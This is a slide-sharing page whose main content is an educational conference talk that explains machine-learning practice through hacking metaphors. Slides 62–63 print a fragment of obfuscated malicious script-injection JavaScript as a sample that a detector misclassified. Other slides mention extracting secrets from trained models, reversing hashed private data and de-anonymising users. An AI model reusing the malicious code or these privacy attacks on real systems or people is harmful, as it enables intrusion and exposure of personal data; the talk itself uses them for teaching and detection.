Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Nexer Digital
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems S.M.S.A.
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
SOFTTECHHUB
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
Neo4j
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
ThomasParaiso2
 
Data structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdfData structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdf
TIPNGVN2
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
Neo4j
 

Recently uploaded (20)

Large Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial ApplicationsLarge Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial Applications
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
 
Data structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdfData structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdf
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
 

Hacking Predictive Modeling - RoadSec 2018

  • 1. Hacking Predictive Modeling HJ van Veen - Data Science & InfoSec @ Nubank
  • 2. 2 “Do machine learning like the great [hacker] you are, not like the great machine learning expert you aren’t.” - Zinkevich
 Rules of Machine Learning: Best Practices for ML Engineering (2015, Zinkevich)
  • 3. Who am I? • Thankful for the opportunity to speak here! • Data scientist & InfoSec analyst at Nubank
 • Competitive data science fanatic
 • Horrible Portuguese speaker (more so with public speaking). Questions and clarifications in English please.
 • @mlwave
  • 4. Disclaimer • These slides are for entertainment, educational and research purposes only.
 • ML is powerful and easy: “Como toda descoberta científica dá mais poderes sobre a natureza, ela pode aumentar o bem ou o mal.” - César Lattes
 • Hacking is fun: But not a substitute for rigorous study and theory. Think of the impact your ML solution has on users.
 
 acm.org/code-of-ethics
  • 5. Scope • This presentation will be all over the place. I don’t know if you never trained a model before, or are experienced with ML.
 • But I hope this presentation will be interesting for the hackers, makers, creators of all types.
 • Catch me afterwards, if you want to talk about hyper optimization.

  • 7. What is AI? Self-Normalizing Neural Networks (2017, Klambauer et al.) A Tutorial on Energy-Based Learning (2006, LeCun et al.)
  • 9. What is AI? Deep Visual-Semantic Alignments for Generating Image Descriptions (2015, Karpathy et al.) Boy holds baseball bat Cat sits on couch
  • 10. What is AI? • AI grew out of Operations Research after WWII
 • AI consists of many diverse subfields ranging from: Psychology, Neuroscience, Mathematics, Linguistics, Learning Theory, (Quantum) Physics, Computer Science, Information Theory, Statistics, Robotics, Philosophy, Machine Learning. • Fight hype. Just replace word `AI` with `Software`: If result sounds silly or obvious, then the application of AI usually is too. Power word: “What is your false positive rate?”. 

  • 11. What is Machine Learning? • Automatically learn from data
 • Increased business usage: AI, Machine Learning, Software will continue eating the world. • Unsupervised learning (Amazon Recommendations). Supervised learning (Spam classification). Reinforcement learning & Self-supervision/Self-play (AlphaGo). • Consists of: Engineering, research, data management, domain expertise, analysis, decision science, safety, legal, ethics, UX, monitoring, predictive modeling.
 Why Software Is Eating the World (2016, Andreessen Horowitz)
  • 12. What is Predictive Modeling? • Puts the focus on creating predictions:
 • Use of model, • how to use the data, • how to get good accuracy.
 • Essential to create a first solution. But the bare minimum to what goes into Machine Learning at commercial scale. ML competitions are largely about predictive modeling.
  • 13. Useful Paradigms • Functionalism: Input -> Function -> Output
 • Connectionism: Learn from data bottom-up, not top-down by stacking learning primitives.
 • Black Box Learning: Let the machine do the work. Don’t care if I understand what it does.
 • Coding Theory: Error detection and compression
  • 14. Functionalism • Philosophy of Mind: Mental states are defined by how they function, not defined by what they are made of. • Function does not depend on the material: You can build a functional mouse trap from wood or metal.
 • Perhaps we can model functional intelligence with computers too?
 

  • 15. Functionalism Transform Model OutputInput Reality Sensory Processing Mental Modeling Behavior Data Feature Engineering Predictive Modeling Predictions
  • 16. Connectionism • Philosophy of Mind: Cognition can arise by connecting functional nodes to form a network structure.
 • Artificial Neural Nets & Deep Learning are examples of this approach: Stacking layers of nodes for ever higher-level learning
 • Perhaps we can model intelligence with network architectures too?
 
 Connectionism - Stanford Encyclopedia of Philosophy (1997, Garson)
  • 17. Connectionism Decision Demons Cognitive Demons Feature Demons Image Demons Pandemonium: A paradigm for learning. (Selfridge, 1959)
  • 18. Black Box ML • View machine learning models as a black box: You only care about what goes in, and what goes out (its function). "A labrador retriever puppy with tongue hanging out"
  • 19. Black Box ML • View machine learning models as a black box: You only care about what goes in, and what goes out (its function). • Don’t care if there is a magical deamon or a complex maths formula in the box. • Question then becomes: How to transform the data, how to parametrize the black box, so to get the best predictions? • Remember: Garbage in - Garbage out (Don’t trust for critical stuff like healthcare or self-driving cars or AGI) The Chinese Room Argument - Stanford Encyclopedia of Philosophy (Cole, 2004)
  • 20. Coding Theory • Coding theory is concerned with effective communication and data integrity • Cryptography, Error Correction, Data Compression: All about finding (or hiding) the signal in the noise. • Machine Learning is essentially learning to correct errors. • Data compression, just like ML, is about finding the most relevant patterns.
  • 21. Coding Theory 1 MegaByte 180 KiloByte
  • 22. Data • Data can be structured or unstructured. • Tabular data is structured and can more readily be used
 • Text and Sound and Images are unstructured
 • Data can be temporal, for instance: time-series
 • Rarely, data is in shape of a graph (for instance, relations between gang members)
  • 23. Feature Engineering • Most data needs to be converted to numbers first
 • Feature engineering:
 Transform Model OutputInput Data Feature Engineering Predictive Modeling Predictions
  • 24. Feature Engineering • Most data needs to be converted to numbers first
 • Feature engineering:
 • is transforming data into something a model can understand. • Creative part of ML with enough tricks to write a book • Has a few basic tricks that are enough to get most models to work well.
 Feature Extraction - Foundations and Applications (Guyon et al., 2006)
  • 25. Feature Engineering: Tricks • Categorical Variables
 • One-hot encoding for neural nets:
 
 
 • Label encoding for decision trees: Red Green Blue 1 2 3 Red Green Blue Red Green Blue 1 0 0 0 1 0 0 0 1
  • 26. Feature Engineering: Tricks • That’s really (mostly) it!
 • You can now apply the most advanced machine learning algorithms to data and something you want to predict.
 • More advanced feature engineering uses domain expertise, intuition, unsupervised learning/embeddings, and automation (see FeatureTools).
 Feature Engineering - Sao Paulo ML Meetup (2017, van Veen)
  • 27. Modeling • A model tries to give accurate predictions for new unseen data. • It uses training data together with labels/ground truth/what you want to predict. Transform Model OutputInput Data Feature Engineering Predictive Modeling Predictions
  • 28. Modeling Gender Likes Open Source? Wants RoadSec ticket? 1 1 1 0 1 1 1 1 0 0 1 1 1 0 0 0 0 0 1 0 0 0 0 0
  • 29. Modeling Gender Likes Open Source? Wants RoadSec ticket? 0 1 ? • Gender did not show any correlation and 3/4 of people who Likes Open Source also wanted a RoadSec ticket. • A good model may predict a probability of 0.75, or a hard prediction of 1.
  • 30. Modeling • What model do you use for data? 
 • Tabular data: Gradient boosted decision trees (XGBoost)
 • Images: Pre-trained deep neural net (or Detectron)
 • Text: TFIDF -> Logistic Regression (or FastText, ULMNet, BERT) Search for above terms in combination with “machine learning”
  • 31. Evaluation Gender Likes Open Source? Wants RoadSec ticket? 1 1 1 0 1 1 1 1 0 0 1 1 1 0 0 0 0 0 1 0 0 0 0 0
  • 32. Evaluation Gender Likes Open Source? Wants RoadSec ticket? 1 1 1 0 1 1 1 1 0 0 1 1 1 0 0 0 0 0 1 0 0 0 0 0 Train Predict The Elements of Statistical Learning (2001, Friedman et al.)
  • 33. Evaluation Gender Likes Open Source? Wants RoadSec ticket? 1 1 1 0 1 1 1 1 0 0 1 1 1 0 0 0 0 0 1 0 0 0 0 0 Train Predict
  • 34. Evaluation Predictions Wants RoadSec ticket? 1 1 1 1 1 0 1 1 0 0 0 0 0 0 0 0 7/8 Accuracy Score
  • 35. Optimization • A Python classifier may look like:
 
 FactorizationMachineBinaryClassifier(iters=5, learning_rate=0.1, latent_dim=20, radius=0.5,
 lambda_linear=0.0001, lambda_latent=0.0001, normalize='Auto', norm=True, caching='Auto', shuffle=True, verbose=True) Trick is to tweak these parameters to get a better evaluation. Then stop when any change makes evaluation worse.
  • 36. Brute Forcing • View hyper parameter optimization as a password cracking task
 • Enumerate or randomly try all possible parameters within a range.
 • Dictionary attack: Use “password dictionary files” with good parameters that worked on other problems. Try these first.
 • This is basically Random Search or Adaptive Search
 Random Search for Hyper-Parameter Optimization (Bergstra et al., 2012)
  • 37. Brute Forcing • How to find the best weights for an average ensemble? • Is it differentiable? • Which optimizer do we pick? • Do we set any regularization? • Allow negative weights?
 • How about trying every possible combination of weights and pick the best evaluation? Worst case: you spend 2 hours more compute.
 KazAnova@kaggle
  • 38. Brute Forcing • Do we really need to manually train all these models?
 • What would happen if we automatically train a 1000 random models with random data transformations and throw them all into another black box?
 • Out comes a winning Kaggle submission… 
 Kaggle Ensembling Guide (van Veen et al., 2015)
  • 39. Fuzzing with Permutations • View feature interaction expansion/feature selection as a fuzzing task. • Train a model and evaluate on test set.
 • For every column in test set: • randomly shuffle the column • Evaluate the new predictions • If evaluation is better with randomly shuffled features, then you can safely discard the column. 
 Permutation importance: a corrected feature importance measure (Altmann et al., 2010) via far0n@kaggle See Fast.AI tutorial for more on this technique.
  • 40. Script kiddies • Use tools developed by others to attack a machine learning problem. • ML Community is incentivized to share easy-replicable code. • Wield same power as the biggest AI companies in the world. • No shame in this! Start somewhere, why not near the top?

  • 41. Warez • Good tools: 
 • allow you to experiment and iterate quickly
 • have an active community contributing new features
 • can be applied to many different problems with similar results.
 • abstract away complexity.

  • 42. Python • Grown to be essential to data science and machine learning. 
 • Learn Python The Hard Way and you have access to an amazing machine learning stack. • Then learn “one-- and preferably only one --obvious way to do it.” • Python code can read like pseudo-code
 PEP 20 — The Zen of Python (Peters, 2004) Beat the benchmark with less then 200MB of memory (tinrtgu, 2014)
  • 43. Python from sklearn import datasets, ensemble iris = datasets.load_iris() X = iris.data y = iris.target model = ensemble.GradientBoostingClassifier() model.fit(X, y) p = model.predict(X)

  • 44. Scikit-Learn • The Metasploit of Machine Learning
 • Uses one API for all models (models are all trained the same way, so learn it only once, and have access to all models)
 • Could get by for a while learning only this library very well
 Scikit-learn: Machine Learning in Python (Pedregosa et al., 2011)
  • 45. XGBoost • The best for tabular data: 
 • Extremely fast • Very good performance • Can model complex problems • Supports Scikit-Learn API
 • Alternatives: GradientBoostingClassifier, CatBoost, LightGBM. XGBoost: A Scalable Tree Boosting System (2016, Chen et al.)
  • 46. Keras User-friendly wrapper around deep learning libraries such as TensorFlow. • Learn Keras and you can work with the latest architectures in deep learning.
 • Alternatives: PyTorch with Fast.AI library
 
 Deep Learning with Python (Chollet, 2017)
  • 47. Vowpal Wabbit • Very fast online learning on data bigger than memory
 Can be faster and more accurate than Hadoop/Spark • Uses cool hashing trick inspired by Bloom filter • Support for contextual bandits (automated decision making) • Eat raw features: • 1 '10000074 |f category_x_transport emails_cnt:0.0 emails_cnt_x_0 avtomobil_ v ideal_nom sostoanii exclamationmark 2005 A Reliable Effective Terascale Linear Learning System (Agarwal et al., 2011)
  • 48. Pandas & NumPy & SciPy • Read and manipulate tabular data with Pandas
 • Fast, scalable and supports many types of data
 • Perform vector operations on NumPy (or Numba) arrays
 • Wide support for scientific calculations 
 Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython (McKinney, 2011)
  • 49. Reverse Engineering • Use frequency tables to reverse engineer the data to its original form.
 • label:TF -> English_word_frequency(IDF(label)) -> Porter_Stemmer(word):TF*IDF
 • feature5:bfqm9c -> US_state_population(ratio(bfqm9c)) ->
 State:New_York Tricks as seen on the Kaggle forums
  • 50. Reverse Engineering • Use model predictions to reverse engineer the training data.
 • Simple brute-force can use fitted language models to retrieve: • Credit Card Numbers • Social Security Numbers / CPF’s • if it has seen this before once (DL is good at memorization) The Secret Sharer: Measuring Unintended Neural Network Memorization & Extracting Secrets (Carlini et al., 2018)
  • 51. Social Engineering • You can not survive in most business with just predictive modeling.
 • Companies don’t hire an AutoML solution, they hire people.
 • The majority of the day-to-day complexity in the chain between data infrastructure and decision makers is social, not technical.
  • 52. Social Engineering • How to gain access to online data science community?
 • Compete together. • Write a cool blog about it. • Write/contribute Open Source projects. • Write tutorials/step-by-step’s.
 • Basically share everything: A 100-line Python script (toy wrapper for Regularized Greedy Forest) could grow to a professional project that you now can use yourself. https://github.com/RGF-team/rgf
  • 53. Operational Security • Business: • Keep pipelines simple • Document & Revisit • Automate, Test & Monitor
 • Competitions: • Loose lips sink ships: Be careful what competitive advantage you share • Show not tell: Save your most powerful models ‘till the very last
  • 54. Hacking Leaderboards • Always wanted to rank #1 on a leaderboard?
 • Wacky Boosting: • Keep changing your submission • use leaderboard feedback to see if it was a good change or a bad change. • Keep good changes. • Repeat until you are #1
 • Will horribly overfit, but can also cause others to overfit! Competing in a data science contest without reading the data (2015, Hardt)
  • 55. Information Snooping • Normally not advisable to use the test set. But for competitions the test is available, so:
 • Can use semi-supervised learning to extract information from the test set. Use test set for:
 • Frequency (TFIDF) or pre-training language models • Fitting dimensionality reduction • Adding confident predictions as labels to train set github.com/gatapia Guido Tapia
  • 56. Rainbow tables • Sometimes categorical variables are hashed to obscure them.
 • Can use rainbow tables to reverse (truncated) MD5 hash and get the original feature.
 • One time, this was obfuscated ordinals for a job puzzle • One time, this was private data: IP addresses. Oops! • One time, they forgot to obfuscate a misspelled patient name in a psychiatric report. Oops!
  • 57. Breaking Stuff • Keep asking your curious self: What would happen if I changed this to that? Be Bold!
 • Local evaluation is your lifeline.
 • Try everything, keep the good.
 • Once I got an accuracy of 181% by submitting correct answers twice. Statisticians Machine Learners Smart Machine Learner (The joke is that there are only smart statisticians) CV Intelligible Models for HealthCare: Predicting Pneumonia Risk and Hospital 30-day Readmission (Caruana, 2015)
  • 58. DataLeaks • A very common mistake. Can be deadly for business and science, so become good at finding leaks. • The task was to predict cancer. One of the variables was “underwent surgery for cancer, yes/no?” • You can not use data that is not reasonably available at test time (or your lifeline evaluation can not be trusted). Leakage in data mining: Formulation, detection, and avoidance (Kaufman et al., 2012)
  • 59. DataLeaks • Beware: The more powerful your model, the bigger chance for exploiting any leakage left that you did not find. • Most powerful model is a 1000 data scientists on a typewriter, so that’s why competitions see larger leakage discovery.
 • A large sample of leakage may simply go undetected. Ben Hamner & Will Cukierski @ Kaggle
  • 60. DataLeaks • Winners of Microsoft malware binary classification 2015 were able to extract the desktop icon from the code. Visualize malware patterns - Microsoft Malware Classification Challenge BIG2015, (Chen, 2015)
  • 61. Sub-Linear Debugging • Output information while your computations are running, essential for iteration speed: • Can spot very fast if some change was good or bad. • Feels like NEO in the Matrix if you do this with the data itself during data reading. • Can spot data health issues (text encoding errors, all missing in the same row of data, etc.) Online Learning and Sub-Linear Debugging (Mineiro, 2014)
  • 62. Error Debugging • See where your model makes the biggest mistakes. • Then try to fix it by creating new features • Below sample confidently predicted as minified JS when it was actually obfuscated malicious JS:
 
 
 
 
 
 4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31 x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65"," x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const _0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]= true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][ Warsaw.js
  • 63. Error Debugging • How to fix? • Add count of numbers / count of characters • Add human-readability score • Add count of “x” / count of characters
 
 
 
 
 
 4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31 x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65"," x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const _0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]= true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
  • 64. Dumpster Diving • You should find out the sources and shapes of all your data, then do a deep dive:
 • Winners of the IJCNN 2011 Challenge wrote a Flickr crawler to de-anonimize users and obtain the ground truth.
 • Winners of the West Nile Virus Prediction Challenge found research papers which contained part of the ground truth.
 
 Link Prediction by De-anonymization: How We Won the Kaggle Social Network Challenge (2011, Narayan et al.)
  • 65. Adversarial Input • These people are invisible to % of modern face detection CV Dazzle (Harvey et al., 2010)
  • 66. Adversarial Input • This image is confusing to modern object detection “A foreign attack helicopter firing missiles” Is attacking machine learning easier than defending it? (Goodfellow et al., 2017)
  • 67. Adversarial Input • Being able to fool neural networks, or build strong defenses against adversarial images is hugely valuable.
 • NIPS2018: Defense Against Adversarial Attack • Goodfellow et al.: CleverHans • Google: Unrestricted Adversarial Examples Challenge
  • 68. Adversarial Thinking • Pretend you are an Identity Fraudster: • Do you hack at night or during your day job/school? • Do you change details like email to match your victim’s name? • Are you more likely to use Windows or Linux? • Do you move location often, or use Tor to hide your location? • Do you try to get as much money as fast as possible or more patient? • Do you memorize your victim’s personal details?
 

  • 69. Adversarial Thinking • Try to attack a system, then invent safeguards: • Encode time of day of the attempt • Look at string distance between legal name and email name • Deduce operating system from user agent string • Check if IP was used for malicious behavior before • Check if IP is a Tor IP • Check for how long user spend in funnel / form behavior • Check if the user demands an unusually high limit • … Statistical Fraud Detection: A Review (Bolton et al., 2002)
  • 70. Botnet • Much of commercial ML can or is being automated. Much of advertisement fraud is automated already. • It is possible to get a good score in a competition completely automatically. • You can aggregate the results of many (automated) agents and get an even better result. • Thinking back to the ID fraudster example. Can you imagine how to cheat a ML competition? Could you encode ways to safeguard against this? Clickjacking campaign abuses Google Adsense, avoids ad fraud bots (Segura, 2017)
  • 71. Case Study: Higgs Boson • “A ciência não pode prever o que vai acontecer. Só pode prever a probabilidade de algo acontecer.” - César Lattes
 • Use data from the ATLAS experiment to identify the Higgs boson (probability of it being signal or background noise)
 • No knowledge of particle physics is required.
 • XGBoost was a 0-day during competition (This could’ve been you!) Higgs Boson Detection Challenge (2014, Kaggle & CERN)
  • 72. Case Study: Higgs Boson • Lets hack together a solution: • Create random feature interactions and use Permutation Feature Importance to select the best ones • Add the best interactions to the data • Train 50 randomly initialized XGBoost models • Pick best log loss model and lower the learning rate and use early stopping to find the best amount of trees. • Repeat above 3 times and average results Position: 30/1785
  • 73. Further Learning • MOOC’s: Andrew Ng’s Machine Learning on Coursera, Competitive Data Science Coursera, Abu-Mustafa Caltech Learning from Data • Platforms: Kaggle (Tutorials, Projects, Competitions, Forums, Kernels) • Programs: Fast.AI (Learn deep learning state-of-the-art) • Meetups: Sao Paulo Machine Learning Meetup • Books: Programming Collective Intelligence • Blogs: MLWave, FastML, MLWhiz, Machine Learning is Fun! • Professors: Find cool professor and study their online output